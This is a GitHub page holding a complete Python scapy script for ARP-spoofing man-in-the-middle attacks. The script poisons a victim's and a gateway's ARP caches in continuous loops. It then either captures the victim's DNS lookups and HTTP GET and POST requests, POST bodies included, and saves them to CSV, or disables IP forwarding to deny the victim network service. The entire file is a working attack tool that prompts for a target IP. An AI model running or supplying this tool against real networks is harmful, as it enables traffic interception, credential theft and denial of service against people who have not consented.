-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy patharp-spoofing-python.py
364 lines (331 loc) · 9.42 KB
/
arp-spoofing-python.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
# -*- coding: utf-8 -*-s
from scapy.all import *
import threading
import os
import sys
from datetime import datetime
import utils
# gets mac address from ip
def get_MACaddress(ip):
pack = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip, hwdst="ff:ff:ff:ff:ff:ff")
resp = srp1(pack, verbose=0, timeout=2)
if resp:
return resp.hwsrc
else:
return None
# victim poisoning, sends ARP packets to victim by faking gateway
def v_poison():
p = Ether(dst=V_MAC) / ARP(psrc=GW_IP, pdst=V_IP, hwdst=V_MAC)
while True:
try:
srp1(p, verbose=0, timeout=1)
except KeyboardInterrupt:
sys.exit(1)
# gateway poisoning, sends ARP packets to the gateway by faking victim
def gw_poison():
p = Ether(dst=GW_MAC) / ARP(psrc=V_IP, pdst=GW_IP, hwdst=GW_MAC)
while True:
try:
srp1(p, verbose=0, timeout=1)
except KeyboardInterrupt:
sys.exit(1)
# captures, displays and exentually saves the required traffic of a packet
def sniff_request():
if SNIFF_SERVICES[SNIFF_SERVICE] == "DNS":
sniff(iface=INTERFACE, filter="udp port 53", prn=dns_sniff_request)
elif SNIFF_SERVICES[SNIFF_SERVICE] == "HTTP GET":
sniff(iface=INTERFACE, filter="tcp port 80", prn=http_sniff_get_request)
elif SNIFF_SERVICES[SNIFF_SERVICE] == "HTTP POST":
sniff(iface=INTERFACE, filter="tcp port 80", prn=http_sniff_post_request)
elif SNIFF_SERVICES[SNIFF_SERVICE] == "ALL AVAILABLE":
sniff(iface=INTERFACE, filter="tcp port 80 or udp port 53", prn=sniff_all)
else:
print("Fatal Error: Missing action!\nAborting...")
sys.exit(1)
# capture, displays and eventually saves all the services provided by this program from a packet
def sniff_all(pkt):
# if pkt.haslayer(TCP) and pkt.getlayer(IP).src==V_IP : print(str(pkt.getlayer(TCP)))
dns_sniff_request(pkt)
http_sniff_get_request(pkt)
http_sniff_post_request(pkt)
# captures, displays and eventually saves dns traffic of a packet
def dns_sniff_request(pkt):
# adding sourcecondition
try:
pkt.getlayer(IP).src
pkt.getlayer(Ether).src
except AttributeError:
return
if (
pkt.getlayer(IP).src == V_IP
and pkt.getlayer(Ether).src == V_MAC
and pkt.haslayer(DNS)
and pkt.getlayer(DNS).qr == 0
):
date = datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
print(
date
+ " Service: DNS"
+ " Victim: "
+ pkt.getlayer(IP).src
+ " ("
+ pkt.getlayer(Ether).src
+ ") is resolving "
+ pkt.getlayer(DNS).qd.qname
)
if not SAVE_FILE_PATH == "":
utils.save_to_csv_file(
[
date,
pkt.getlayer(IP).src,
pkt.getlayer(Ether).src,
"DNS request",
pkt.getlayer(DNS).qd.qname,
],
SAVE_FILE_PATH,
)
# captures, displays and eventually saves http GET requests
def http_sniff_get_request(pkt):
if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80:
try:
# getting GET request and Host header
raw_content = str(pkt.getlayer(TCP))
lines = raw_content.split("\r\n")
get_request = ""
host_request = ""
for line in lines:
if "GET" in line:
get_line = line.split(" ")
for index, l in enumerate(get_line):
if "GET" in l:
get_request = get_line[index + 1]
if "Host:" in line:
host_request = line.split(" ")[1]
# checking if packet has source fields
try:
pkt.getlayer(IP).src
pkt.getlayer(Ether).src
except AttributeError:
return
# displaying content if GET request is found and if it is from Victim
if (
pkt.getlayer(IP).src == V_IP
and pkt.getlayer(Ether).src == V_MAC
and not get_request == ""
):
date = datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
print(
date
+ " Service: HTTP_GET"
+ " Victim: "
+ pkt.getlayer(IP).src
+ " ("
+ pkt.getlayer(Ether).src
+ ") is requiring document: "
+ host_request
+ get_request
)
if not SAVE_FILE_PATH == "":
utils.save_to_csv_file(
[
date,
pkt.getlayer(IP).src,
pkt.getlayer(Ether).src,
"HTTP_GET request",
host_request + get_request,
],
SAVE_FILE_PATH,
)
except IndexError:
return
# captures, displays and eventually saves http POST requests
def http_sniff_post_request(pkt):
if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80:
try:
# getting GET request and Host header
raw_content = str(pkt.getlayer(TCP))
lines = raw_content.split("\r\n")
post_request = ""
host_request = ""
found_first_empty_line = False
post_content = ""
for index, line in enumerate(lines):
if "POST" in line:
post_line = line.split(" ")
for index1, l in enumerate(post_line):
if "POST" in l:
post_request = post_line[index1 + 1]
if "Host:" in line:
host_request = line.split(" ")[1]
if line == "" and found_first_empty_line == False:
found_first_empty_line = True
post_content = lines[index + 1]
# checking if packet has source fields
try:
pkt.getlayer(IP).src
pkt.getlayer(Ether).src
except AttributeError:
return
# displaying content if GET request is found and if it is from Victim
if (
pkt.getlayer(IP).src == V_IP
and pkt.getlayer(Ether).src == V_MAC
and not post_request == ""
):
date = datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
print(
date
+ " Service: HTTP_POST"
+ " Victim: "
+ pkt.getlayer(IP).src
+ " ("
+ pkt.getlayer(Ether).src
+ ")"
+ " is sending document: "
+ host_request
+ post_request
+ " Content:"
+ post_content
)
if not SAVE_FILE_PATH == "":
utils.save_to_csv_file(
[
date,
pkt.getlayer(IP).src,
pkt.getlayer(Ether).src,
"HTTP_POST request",
(
"POST location:"
+ host_request
+ post_request
+ " Content:"
+ post_content
),
],
SAVE_FILE_PATH,
)
except IndexError:
return
# presentation
utils.program_header(["ARP spoofing MITM", "Version: 0.3", "Author: Carlo Cervellin"])
# constants
ATTACK_TYPE_SNIFF = 0
ATTACK_TYPE_DOS = 1
SNIFF_SERVICES = ["ALL AVAILABLE", "HTTP GET", "HTTP POST", "DNS"] # 0 # 1 # 2 # 3
DEFAULT_GATEWAY_IP = "192.168.0.1"
DEFAULT_INTERFACE = "wlan0"
# receiving user input
print("\n" + "=" * 20 + " TARGETS DEFINITION " + "=" * 20)
V_IP = raw_input("Insert the IP address to attack: ")
GW_IP = raw_input(
'Insert the gateway IP address [default "' + DEFAULT_GATEWAY_IP + '"]: '
)
INTERFACE = raw_input(
'Insert the network interface name [default "' + DEFAULT_INTERFACE + '"]: '
)
print("=" * 20 + " ATTACK TYPE DEFINITION " + "=" * 20)
ATTACK_TYPE = 0
ATTACK_TYPE_INPUT = raw_input(
"Choose tattack type:\n" + "\t[0, empty, invalid] SNIFF\n" + "\t[1] DOS\n"
)
try:
ATTACK_TYPE = int(ATTACK_TYPE_INPUT)
except ValueError:
pass
SNIFF_SERVICE = 0
SAVE_FILE_PATH = ""
if ATTACK_TYPE == ATTACK_TYPE_SNIFF:
SNIFF_SERVICE_INPUT = raw_input(
"Choose tattack type:\n"
+ "\t[0, empty, invalid] ALL AVAILABLE\n"
+ "\t[1] HTTP GET\n"
+ "\t[2] HTTP POST\n"
+ "\t[3] DNS\n"
)
try:
SNIFF_SERVICE = int(SNIFF_SERVICE_INPUT)
except ValueError:
pass
SAVE_FILE_PATH = raw_input(
"Save output file name or path (output file is a csv file) [empty means no saving file]: "
)
# checking user ip target and network interface and setting default in case missing
if GW_IP is None or GW_IP == "":
GW_IP = DEFAULT_GATEWAY_IP
if INTERFACE is None or INTERFACE == "":
INTERFACE = DEFAULT_INTERFACE
# print a final resume of user input variables
if ATTACK_TYPE == ATTACK_TYPE_SNIFF:
SERVICE_STRING = SNIFF_SERVICES[0]
try:
SERVICE_STRING = SNIFF_SERVICES[SNIFF_SERVICE]
except IndexError:
pass
print(
"ATTACK RESUME: sniffing "
+ V_IP
+ " "
+ SERVICE_STRING
+ " traffic with gateway "
+ GW_IP
+ " from network interface "
+ INTERFACE
+ ""
)
_SAVE_FILE_ABSOLUTE_PATH = os.path.abspath(SAVE_FILE_PATH)
if not SAVE_FILE_PATH == "":
print("Saving output to file: " + _SAVE_FILE_ABSOLUTE_PATH)
elif ATTACK_TYPE == ATTACK_TYPE_DOS:
print(
"ATTACK RESUME: denying services for "
+ V_IP
+ " with gateway "
+ GW_IP
+ " from network interface "
+ INTERFACE
)
else:
print("Fatal Error, ATTACK_TYPE not defined\nAborting...")
sys.exit(1)
print("Type anything to start the attack:")
raw_input()
# getting victim and gateway mac address by iterating research until both are found
print("Obtaining MAC addresses (may take a few attempts)...")
while True:
V_MAC = get_MACaddress(V_IP)
GW_MAC = get_MACaddress(GW_IP)
if V_MAC is None:
print("Cannot find victim MAC address (" + V_IP + "), retrying...")
elif GW_MAC is None:
print("Cannot find victim MAC address (" + GW_IP + "), retrying...")
else:
break
print("Attack targets have been found!")
# showing ARP spoofing targets
print("Victim: " + V_IP + " (" + V_MAC + ")")
print("Gateway: " + GW_IP + " (" + GW_MAC + ")")
print("Poisoning victim and gateway...")
# enable or disable IP forwarding
if ATTACK_TYPE == ATTACK_TYPE_DOS:
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
else:
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
vthread = []
gwthread = []
if ATTACK_TYPE == ATTACK_TYPE_SNIFF:
print("Showing sniffed traffic...")
elif ATTACK_TYPE == ATTACK_TYPE_DOS:
print("DOS attack in action...")
print("INFO: Stop script by pressing the interrupt key combination CTRL+C")
# main program loop
while True:
vpoison = threading.Thread(target=v_poison)
vpoison.setDaemon(True)
vthread.append(vpoison)
vpoison.start()
gwpoison = threading.Thread(target=gw_poison)
gwpoison.setDaemon(True)
gwthread.append(gwpoison)
gwpoison.start()
if ATTACK_TYPE == ATTACK_TYPE_SNIFF:
sniff_request()